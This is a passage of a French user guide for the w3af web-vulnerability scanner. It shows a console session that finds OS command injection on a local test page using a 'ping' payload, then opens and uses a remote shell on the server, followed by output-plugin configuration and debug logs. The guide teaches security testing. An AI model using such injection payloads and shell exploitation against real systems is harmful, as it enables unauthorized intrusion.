w3af Guide de l'Utilisateur - Exploit Database

More documents

Recommendations

Info

w3af/plugins>>>audit osCommandingw3af/plugins>>>backw3af>>>targetw3af/config:target>>>set targethttp://localhost/w3af/osCommanding/vulnerable.php?command=f0as9w3af/config:target>>>backw3af>>>startFound 1 URLs and 1 different points of injection.The list of URLs is:- http://localhost/w3af/osCommanding/vulnerable.phpThe list of fuzzable requests is:- http://localhost/w3af/osCommanding/vulnerable.php | Method:GET | Parameters: (command)Starting osCommanding plugin execution.OS Commanding was found at: "http://localhost/w3af/osCommanding/vulnerable.php", using HTTP method GET. The sent data was:"command=+ping+-c+9+localhost". The vulnerability was found inthe request with id 5.Finished scanning process.w3af>>>exploitw3af/exploit>>>exploit osCommandingShellosCommandingShell exploit plugin is starting.The vulnerability was found using method GET, tried to changethe method to POST for exploiting but failed.Vulnerability successfully exploited. This is a list ofavailable shells:- [0] Please use the interact command to interact with the shellobjects.w3af/exploit>>>interact 0Execute "endInteraction" to get out of the remote shell.Commands typed in this menu will be runned on the remote webserver.w3af/exploit/osCommandingShell-0>>>lsvulnerable.phpvulnerable2.phpw3afAgentClient.log
w3af/exploit/osCommandingShell-0>>>endInteractionw3af/exploit>>>backw3af>>>exitspawned a remote shell today?$La sortieToutes les sorties de w3af sont gérées par les plugins output. Chaque pluginoutput va écrire dans un format différent (txt, html, etc.), par exemple; le plugintextFile écrit toutes les sorties dans le fichier output-w3af.txt par défaut. Laconfiguration de ces plugins se fait comme pour les autres plugins vusprécédemment:$ ./w3af_consolew3af>>> pluginsw3af/plugins>>> output console,textFilew3af/plugins>>> output config textFilew3af/plugins/output/config:textFile>>> set fileName outputw3af.txtw3af/plugins/output/config:textFile>>> set verbose Truew3af/plugins/output/config:textFile>>> backw3af/plugins>>> output config consolew3af/plugins/output/config:console>>> set verbose Falsew3af/plugins/output/config:console>>> backCela va configurer le plugin textFile pour sortir tous les messages, incluant lesinformations de débogage (voir “set verbose True”) vers le fichier “outputw3af.txt”.Voici un exemple du fichier de sortie:[ Sun Sep 14 17:36:09 2008 - debug - w3afCore ] ExitingsetOutputPlugins()[ Sun Sep 14 17:36:09 2008 - debug - w3afCore ] Calledw3afCore.start()[ Sun Sep 14 17:36:09 2008 - debug - xUrllib ] CalledbuildOpeners[ Sun Sep 14 17:36:09 2008 - debug - keepalive ] keepalive: Theconnection manager has 0 active connections.
Page 1 and 2: w3af Guide de l'UtilisateurVersion:
Page 3 and 4: IntroductionCe document est un guid
Page 5: Etapes w3afAvant même de lancer w3
Page 8 and 9: | assert | Check assertion. ||-----
Page 10 and 11: Exécuter w3af avec l'interface uti
Page 12: Configuration de PluginLes plugins
Page 15 and 16: The extensions parameter is a comma
Page 17 and 18: Démarrer un scanAprès avoir confi
Page 19 and 20: ......The URL: http://localhost/bee
Page 21 and 22: Avertissement sur la découverteLa
Page 23: commande à la main dans la console
Page 27 and 28: time=0.037 ms64 bytes from localhos
Page 29 and 30: - http://localhost/w3af/ | Method:
Page 31 and 32: Execute "exitPlugin" to get out of
Page 33 and 34: l'exploitation.Maintenant que l'on
Page 35 and 36: Please wait some seconds while w3af
Page 37 and 38: w3afAgentComme vu dans un épisode
Page 39 and 40: Please wait some seconds while w3af
Page 41 and 42: Plus d'informationsDavantage d'info

w3af Guide de l'Utilisateur - Exploit Database

Create successful ePaper yourself

Delete template?

Save as template?